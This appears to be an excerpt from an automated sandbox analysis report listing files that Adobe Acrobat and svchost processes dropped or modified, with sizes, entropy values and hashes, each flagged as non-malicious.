SHA-512: | 3259CE4830B4DC8DDEBACB88F24C9EEB12A93DCF31C3AA0BD9467EA3742885E16C4DF3A67C43493A4D6125332B070174A33543CFA222D79981CE24EBC9567DCD |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07713851829510271 |
Encrypted: | false |
SSDEEP: | 3:WlKYeMkrY4M0Ajjn13a/6c1NR4X/illcVO/lnlZMxZNQl:WlKz84Mdj53qF/4vGOewk |
MD5: | 6BA0650F22756460AD06A6CF61811361 |
SHA1: | FE1B8FAE85B2A56C66F4AAFD47D003F20974C40F |
SHA-256: | 3B0198409CA0005DB46A92EBFEA59ECE4A1F3B467B895A135DB0F4EDD224EB79 |
SHA-512: | 2F7EA797E5B5A11AF39F1F1324CA3DCBE9979B6A0F357AF70846BA4242522A395E31370B7DE92AD982DFA1F8817A7F6D9F548FFD2D82811D4A8BFD6B140E7327 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.170129916923282 |
Encrypted: | false |
SSDEEP: | 6:iOQFYSVq2Pwkn2nKuAl9OmbnIFUtqF0u6gZmwUF0u6IkwOwkn2nKuAl9OmbjLJ:7i7VvYfHAahFUtgF6g/eF6I5JfHAaSJ |
MD5: | 638F6133FB728E89FEA2729D27E85533 |
SHA1: | FDC54D18658F60AE683BE54F12E5EA9B00F8B3D5 |
SHA-256: | 4371B60802DCAC3362A80822E5A0C0FB47580FA6E6B2A0751B3357FE6D2E968D |
SHA-512: | 2EBADDED5CB68C6DB174ED6289D3D3C123F9FFA4CEF0107C5F86C5EFC4489A6E38CE40FB8AEBA5B5D370A3EDDC7EECC0C62633E6E6984288ADCE368244C34244 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.170129916923282 |
Encrypted: | false |
SSDEEP: | 6:iOQFYSVq2Pwkn2nKuAl9OmbnIFUtqF0u6gZmwUF0u6IkwOwkn2nKuAl9OmbjLJ:7i7VvYfHAahFUtgF6g/eF6I5JfHAaSJ |
MD5: | 638F6133FB728E89FEA2729D27E85533 |
SHA1: | FDC54D18658F60AE683BE54F12E5EA9B00F8B3D5 |
SHA-256: | 4371B60802DCAC3362A80822E5A0C0FB47580FA6E6B2A0751B3357FE6D2E968D |
SHA-512: | 2EBADDED5CB68C6DB174ED6289D3D3C123F9FFA4CEF0107C5F86C5EFC4489A6E38CE40FB8AEBA5B5D370A3EDDC7EECC0C62633E6E6984288ADCE368244C34244 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.181819988452668 |
Encrypted: | false |
SSDEEP: | 6:iOQFQ0aHXAQ+q2Pwkn2nKuAl9Ombzo2jMGIFUtqFYFOAgZmwUFuAQVkwOwkn2nK3:7iQBXAVvYfHAa8uFUtgoOAg/euAI5Jfg |
MD5: | DBA34604518115A2EEC1C61EC401A13E |
SHA1: | 5107D27535ECE3C2BF0A45A05BDFEE2C2C32382F |
SHA-256: | 2E9034DC08AD049FA15ADB667F3D718D441E43D5188D3464F690B07D6B3E39EF |
SHA-512: | 95C2A066DEB0F9889DDFCBF0FBBE9A99DF0AB53B71E0C62AC8E62BAC8AF4B8BB2363733001F5C03AFF1AEB8B0B768C1097A79CE5EEBFFE4204CFB884936B5933 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.181819988452668 |
Encrypted: | false |
SSDEEP: | 6:iOQFQ0aHXAQ+q2Pwkn2nKuAl9Ombzo2jMGIFUtqFYFOAgZmwUFuAQVkwOwkn2nK3:7iQBXAVvYfHAa8uFUtgoOAg/euAI5Jfg |
MD5: | DBA34604518115A2EEC1C61EC401A13E |
SHA1: | 5107D27535ECE3C2BF0A45A05BDFEE2C2C32382F |
SHA-256: | 2E9034DC08AD049FA15ADB667F3D718D441E43D5188D3464F690B07D6B3E39EF |
SHA-512: | 95C2A066DEB0F9889DDFCBF0FBBE9A99DF0AB53B71E0C62AC8E62BAC8AF4B8BB2363733001F5C03AFF1AEB8B0B768C1097A79CE5EEBFFE4204CFB884936B5933 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\604fb36c-2272-49ee-8c94-ca18f59644d6.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.953441890631898 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq6sBdOg2Hcvcaq3QYiubInP7E4T3y:Y2sRdsKdMHce3QYhbG7nby |
MD5: | BD33110C9BC11468DF66167C4A4EF776 |
SHA1: | C2B3D422A458CDB0AEB5EDFF5D723047E9E1A4EF |
SHA-256: | 4F2133B28121DA101B6D021903A2270A4D24C9C7C6B2E066CDEB620839BB9698 |
SHA-512: | 0DB975813DBDB8413E4C57677862FA7DE7075571CF10B3B78219EFEDB0AE490F4E861832F428462104FDA5C750109622D4D89F0059732D84E0A076EA034EB165 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.953441890631898 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq6sBdOg2Hcvcaq3QYiubInP7E4T3y:Y2sRdsKdMHce3QYhbG7nby |
MD5: | BD33110C9BC11468DF66167C4A4EF776 |
SHA1: | C2B3D422A458CDB0AEB5EDFF5D723047E9E1A4EF |
SHA-256: | 4F2133B28121DA101B6D021903A2270A4D24C9C7C6B2E066CDEB620839BB9698 |
SHA-512: | 0DB975813DBDB8413E4C57677862FA7DE7075571CF10B3B78219EFEDB0AE490F4E861832F428462104FDA5C750109622D4D89F0059732D84E0A076EA034EB165 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4320 |
Entropy (8bit): | 5.258222423554517 |
Encrypted: | false |
SSDEEP: | 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7Xb7:etJCV4FiN/jTN/2r8Mta02fEhgO73goj |
MD5: | A95397E7F1E6C22350077D2B1DE24782 |
SHA1: | 57DACA894E201D504C9818A4321E039A9BE4BFB2 |
SHA-256: | D4A1851F7649598A834AE657A78C25C76A87C4287B660D8ADB2100E76F249BD3 |
SHA-512: | 80C7308C80285733D85DB5D2D500EB959260B82A591D5259F79031E9C3A2D5504297C21CACB7ECD2A5413FC34ACB89CC82504E27F23B2B103DBB213A7C4891BB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.146134874494241 |
Encrypted: | false |
SSDEEP: | 6:iOQc1AQ+q2Pwkn2nKuAl9OmbzNMxIFUtqcTMdNAgZmwUcMAQVkwOwkn2nKuAl9Ob:73AVvYfHAa8jFUtfcNAg/OAI5JfHAa8E |
MD5: | F5AC22BF1105D44D10F18002E1793F0D |
SHA1: | 5B04DAA88951CE397C091B76565A4EF40F5FAA21 |
SHA-256: | 3F4DE6BDD1BC96EE0E04EE3E140E92C8FEC7AAC6420254035F4CE4E6A65AF1DE |
SHA-512: | 733D1748828DEF46DF5C60904BF0635AE2EC577C8FE6842BE908EA439B066F6FC412F856120BF1D1FF1BA1D097155972DAE2B824EF2324C0A90AD3B5F90320AA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.146134874494241 |
Encrypted: | false |
SSDEEP: | 6:iOQc1AQ+q2Pwkn2nKuAl9OmbzNMxIFUtqcTMdNAgZmwUcMAQVkwOwkn2nKuAl9Ob:73AVvYfHAa8jFUtfcNAg/OAI5JfHAa8E |
MD5: | F5AC22BF1105D44D10F18002E1793F0D |
SHA1: | 5B04DAA88951CE397C091B76565A4EF40F5FAA21 |
SHA-256: | 3F4DE6BDD1BC96EE0E04EE3E140E92C8FEC7AAC6420254035F4CE4E6A65AF1DE |
SHA-512: | 733D1748828DEF46DF5C60904BF0635AE2EC577C8FE6842BE908EA439B066F6FC412F856120BF1D1FF1BA1D097155972DAE2B824EF2324C0A90AD3B5F90320AA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444597531182101 |
Encrypted: | false |
SSDEEP: | 384:Sedci5t2iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:55s3OazzU89UTTgUL |
MD5: | B71B53D6012D7E20359DFECD6D5ECE31 |
SHA1: | 8FC7A5FB863C3E17B30B59EF14F5B10372B39E51 |
SHA-256: | 80624527FD332391E8BC4892A51D2DB3F6CE099C542476255A5D6FEE0B5E66FA |
SHA-512: | 1D3C34DE0C965922525ADA9FB26A128BD6E813F75B516CD316EDDE4F9308A4D53D0812F3319BBCA0F5B46F022B1844AC35F88E1B5A1911E9B3D560B16EBC391B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.213935353116871 |
Encrypted: | false |
SSDEEP: | 24:7+tMyknuwKlqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9n:7MdknClqvmFTIF3XmHjBoGGR+jMz+Lhd |
MD5: | E8F74C509F1CCE3161ED5FFBEF6F67A0 |
SHA1: | 522D430A12F0FFE9E4D986979D9DCC897719AB59 |
SHA-256: | E17948045CCA80A5B72CC395D0CEEECA9F63538CB7A5F05D4B71F31EBDAF852A |
SHA-512: | 8921D0513D9229855EE7D9D30D66E6666FA62B25D6674947D4EAEAD6345A88D6F2F7FD96E93AF7F1B93708916AF26545BA2332732A7E15182C4B55154B99DF6F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFkla7pEttfllXlE/HT8k6qhl1NNX8RolJuRdxLlGB9lQRYwpDdt:kKDyteT8mz7NMa8RdWBwRd |
MD5: | E8129F4EE3543F3937279EDF6E2FF83B |
SHA1: | 723282BA3DD45F9EA43BDF8B9A5EA3C67430AFB5 |
SHA-256: | 2CA48227FC97DBBFA4C46BA2418BE924748B524F706C2A4A01069A8152C533CD |
SHA-512: | 0F40A4D10D8B57DF74ACD4DA7D0204EEFDF0DF17928172220560CEFCF5D9F5C6A46B1F928498503AD3878F3C3A6D4599E401F910E76645580F83F3CCA1928CC1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.1193918870917794 |
Encrypted: | false |
SSDEEP: | 6:kKNXDL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:lXDiDnLNkPlE99SNxAhUe/3 |
MD5: | D4B881906E5234FC13F4EF3B733DC69E |
SHA1: | 00AC4806F4600B808B51D549FB845246C450AB8E |
SHA-256: | 7467CFDE834E241020D16963824698FC4238A9CB777554874C63AB2BD5ADA7BB |
SHA-512: | CEFD16B60EFED97BED81291FB88AFF1B9E29125D657D415C160FB348B5463426857D0C2BEC822F179B695E073748AA39EB09125C033C2A3BC10DAD4BDC113437 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.350704034821019 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXtByBk8p9VoZcg1vRcR0YIXyoAvJM3g98kUwPeUkwRe9:YvXKXtByBkhZc0v9XBGMbLUkee9 |
MD5: | 8A79549993B4364912CA2516F2B6C922 |
SHA1: | AE5FB35614D92FC61F1F548EC8EF06C8BC166584 |
SHA-256: | 33F748CA6391DA49B00B537F140A00D8837BB80184EA455191A3F20A3E0FD152 |
SHA-512: | 2B7D03D07FF9AB35A9C95351A5E8516C5275D91E309D992305F87EAF80957950CFDF0A8E4564E982192EF382C4BE62A6F9CE546E38A8FDA7270ACDECA73196CE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.299095143985024 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXtByBk8p9VoZcg1vRcR0YIXyoAvJfBoTfXpnrPeUkwRe9:YvXKXtByBkhZc0v9XBGWTfXcUkee9 |
MD5: | 3C4827E8CCF37F5938E1FC9BF167E773 |
SHA1: | 98725871CA4BBDFC444D2CA98006F0087607C38D |
SHA-256: | 8D38DFBD5429A3D9F9B84A58A0F33B5CC43AB819ADE1E1724E6A2F6F59CBEC1C |
SHA-512: | 0820AC24CBC128A6CCAD32C2FE889F2E536D234F667EC15446E6D24B6ECA6EE9C3644B5BAEE008489C2A54A79FC148374A8E06F84EAA09CDF435D63B3368A38D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.276505406695799 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXtByBk8p9VoZcg1vRcR0YIXyoAvJfBD2G6UpnrPeUkwRe9:YvXKXtByBkhZc0v9XBGR22cUkee9 |
MD5: | 58960D382B853DEFAE7395C1180B9B0A |
SHA1: | 2F48F57624023594D68F500ED8DE3B2319452CFC |
SHA-256: | 0BE4D8D2FFFDD6B09CC744CA0AEC84182E4D096DFCE7A1CBF3AE6084FA58C2DD |
SHA-512: | D9AAF36E53A0A756D7C6BD2FC66E763AD27A64DCDFC57FD7640E3391A76E8DE313F209273AA152F57042B619125A3B2021BC00D6E05A15AEC7FE7D80DEB14FE3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.337270353244383 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXtByBk8p9VoZcg1vRcR0YIXyoAvJfPmwrPeUkwRe9:YvXKXtByBkhZc0v9XBGH56Ukee9 |
MD5: | FF61E589B6E39DB9F19B6F19C322E196 |
SHA1: | 8B1908D7FB36130C879BD6FE893D2FED1AC25AF7 |
SHA-256: | 3E30AE67BAEEB08B9304D0562FF072509FD446139A46B4A9C0E761F224789240 |
SHA-512: | 036242E7B545CC4478AC46133D19C3C38D5F16491A5D1925C6BA23C53C04F3A790AF479F7086F9ACE910FB0CD54006DC26FD62116C0DAF18D3F536B285689680 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.685390950398232 |
Encrypted: | false |
SSDEEP: | 24:Yv6XzyKhzv9XmpLgE9cQx8LennAvzBvkn0RCmK8czOCCSnR:YvEyKlXmhgy6SAFv5Ah8cv/nR |
MD5: | 1D21FCF8763F0DB72776BF7B11E87989 |
SHA1: | 81081C174475FFF98700A0870BEB00F8DE343C32 |
SHA-256: | CF3074C9FA3535F930AEEE7A59D29E9D6B830B1E1B24C1EE124251BF585958DB |
SHA-512: | 0DC6330092F8AB257E26777DC5F573065B8519B017D650F6B871747324279D1B28FCBDC12744DE118D538B5FD19714384C3D51B172017D5C41911824E27D05BC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.281943777123755 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXtByBk8p9VoZcg1vRcR0YIXyoAvJf8dPeUkwRe9:YvXKXtByBkhZc0v9XBGU8Ukee9 |
MD5: | C2D6680514F3FC9BEAF15DA9E2CD7FE0 |
SHA1: | 06DBBC20F167B2E04ACCFA883EF9653D6814ACFB |
SHA-256: | 76A385376BF2D397D916AFD0D3CC9DD129C4B661C3BD02A18109922B7820719B |
SHA-512: | FB5ED6ADBD31D64D6BA16D52AF8EDEC0628FA65F37B8C60F540531021486A2454347EDA8D556458D67B7995E58A88225D08509E4000E9FA3625C7444F79ED602 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.286029921887229 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXtByBk8p9VoZcg1vRcR0YIXyoAvJfQ1rPeUkwRe9:YvXKXtByBkhZc0v9XBGY16Ukee9 |
MD5: | 7C3A45135750968070C50972D58F2ED6 |
SHA1: | CBEEA28601F2BFDC601E6E62C5AF4DA88996C190 |
SHA-256: | B0CA31068BF4D47DAD5EA0B6F901D93C132234C1DA11ECF805E2A25D04F5A847 |
SHA-512: | 577D5B108B52DDF501AACD72E9C113F88C8DE7FDCFA8F9F18B61D6E6A9F1D95AA890005ABDB4A6B77EFB23566F119D1C3A75E5B1A90FCA7BDE8B0DE4177BD6E9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.29250217508025 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXtByBk8p9VoZcg1vRcR0YIXyoAvJfFldPeUkwRe9:YvXKXtByBkhZc0v9XBGz8Ukee9 |
MD5: | 0A4B12F85FCEE0636C746E5D88F2A37D |
SHA1: | 304DA4E42FBB1FCAF69DFFA25689C3F71C186B3D |
SHA-256: | 02ADCAE10EC0197E0AF6C720D09FCF0F57627D31DF53F8A20DBF884C07BDF72F |
SHA-512: | CFB1EB88C1EDFD1DEADC9B6B5DD5E63D8B53C54EE0B7D016B0A363648C74B22346F5A6AE42AEBE1B58180139412E273154A99E489F957D0C8D9A803C1FBF6DE9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.309059946244289 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXtByBk8p9VoZcg1vRcR0YIXyoAvJfzdPeUkwRe9:YvXKXtByBkhZc0v9XBGb8Ukee9 |
MD5: | D073849E6E54E9FA796335E1DA042741 |
SHA1: | 2E363212551A1A6671798F80C85BAFFF9CDD3853 |
SHA-256: | BD85DD957088785B79854F00AF954DCB5296F4AA975DA4536F7806DD7B1DFF4C |
SHA-512: | 1D4C4732AA48E3BA2CD6AEC2DAA128D5280DD82F11D3BCB125678781F3449D1986E34763D29BAC5ADC6D1DC8CE52E60667EB0794BFF4D040BCA77707EAD22B18 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.289489771896709 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXtByBk8p9VoZcg1vRcR0YIXyoAvJfYdPeUkwRe9:YvXKXtByBkhZc0v9XBGg8Ukee9 |
MD5: | 10C6E94674BB8DBF008E0360580C1EBC |
SHA1: | FA326EE6DCA5695D8B3DD2519FB50A344B3AC659 |
SHA-256: | 114F20A046023FC553CC06CE8AD3779505D04DAD642B6C80CF11B43DA2F574BA |
SHA-512: | 1A62DD51A40D3F2AF23EB87CB001972EC352030B795DEF347BC82EF5142CFD776E3FC19222D6653BE7480B4BCD789365D4DA7A73DCF4EB65A544363966BCBEE0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.275654096420054 |
Encrypted: | false |
